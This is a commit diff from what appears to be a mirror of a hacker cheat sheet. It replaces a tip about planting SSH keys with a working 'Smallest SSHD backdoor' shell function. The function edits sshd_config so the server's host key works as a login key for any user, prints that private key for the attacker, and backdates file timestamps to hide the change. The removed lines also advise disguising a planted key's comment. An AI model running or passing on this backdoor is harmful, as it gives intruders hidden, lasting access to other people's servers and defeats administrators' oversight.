CalvinBackup/thc-tips-tricks-hacks-cheat-sheet
1
0
Fork 0
mirror of https://github.com/hackerschoice/thc-tips-tricks-hacks-cheat-sheet.git synced 2026-02-12 21:32:51 +00:00
Code Issues Packages Projects Releases Wiki Activity

Update README.md

Browse Source
This commit is contained in:
skyper
2025-12-13 12:23:43 +00:00
committed by GitHub
parent 537d7f0a11
commit 3a3396e89a
1 changed files with 28 additions and 15 deletions
Download Patch File Download Diff File Expand all files Collapse all files

43
README.md
View File

@@ -73,7 +73,7 @@ Got tricks? Join us [https://thc.org/ops](https://thc.org/ops)
1. [Backdoors](#backdoor)
1. [gs-netcat](#gsnc)
2. [sshx.io](#sshx)
1. [authorized_keys](#backdoor-auth-keys)
1. [Smallest SSHD backdoor](#backdoor-sshd)
1. [Remote access an entire network](#backdoor-network)
1. [Smallest PHP backdoor](#php-backdoor)
1. [Smallest reverse DNS-tunnel backdoor](#reverse-dns-backdoor)
@@ -1797,23 +1797,36 @@ curl -SsfL https://s3.amazonaws.com/sshx/sshx-$(uname -m)-unknown-linux-musl.tar
for _ in {1..10}; do [ -s .u ] && break;sleep 1;done;cat .u;rm -f .u .s;
```
<a id="backdoor-auth-keys"></a>
**6.iii. authorized_keys**
<a id="backdoor-sshd"></a>
**6.iii. Smallest SSHD backdoor**
Add your ssh public key to */root/.ssh/authorized_keys*. It's the most reliable backdoor ever :>
Adding your key to *authorized_keys* is overused 😩. Instead, use this (root only):
* It survives reboots.
* It even survives re-installs. Admins have been known to make a backup of authorized_keys and then put it straight back onto the newly installed system.
* We have even seen our key being copied to other companies!
Tip: Change the name at the end of the ssh public keyfile to something obscure like *backup@ubuntu* or the admin's real name:
```
$ cat id_rsa.pub
ssh-rsa AAAAB3NzaC1yc2EAAAADAQABAAABAQCktFkgm40GDkqYwJkNZVb+NLqYoUNSPVPLx0VDbJM0
[...]
u1i+MhhnCQxyBZbrWkFWyzEmmHjZdAZCK05FRXYZRI9yadmvo7QKtRmliqABMU9WGy210PTOLMltbt2C
c3zxLNse/xg0CC16elJpt7IqCFV19AqfHnK4YiXwVJ+M+PyAp/aEAujtHDHp backup@ubuntu
```shell
backdoor_sshd() {
local K="/etc/ssh/ssh_host_ed25519_key"
local D="/etc/ssh/sshd_config.d"
local N=$(cd "${D}" || exit; shopt -s nullglob; echo *.conf)
[ -n "$N" ] && N="${N%%\.conf*}.conf"
N="${D}/${N:-50-cloud-init.conf}"
{ [ ! -f "$K" ] || [ ! -f "$K".pub ]; } && return
grep -qm1 '^AuthorizedKeysFile' "$N" 2>/dev/null && return
/usr/sbin/sshd -V 2>&1 | grep -qE 'SSH_(9|[1-9]{1}[0-9]{1})' || EGG="Y"
echo -e "AuthorizedKeysFile\t${EGG:+.ssh/authorized_keys .ssh/authorized_keys2 }${K}.pub" >>"${N}" || return
echo -e "\e[0;31mYour id_ed25519 to log in to this server as any user:\e[0;33m\n$(cat "${K}")\e[0m"
touch -r "$K" "$N" "$D" \
&& declare -f ctime >/dev/null && ctime "$N" "$D"
systemctl restart ssh
}
backdoor_sshd
```
How it works:
- The SSHD host key is just a normal ed25519 key.
- Any ed25519 key can be used to authenticate a login.
- Configure SSHD to use the *Public Host Key* as an additional list of public keys for authentication.
- SSHD will now check .ssh/authorized_keys and /etc/ssh/ssh_host_ed25519_key.pub for valid login keys.
<a id="backdoor-network"></a>
**6.vi. Remote Access to an entire network**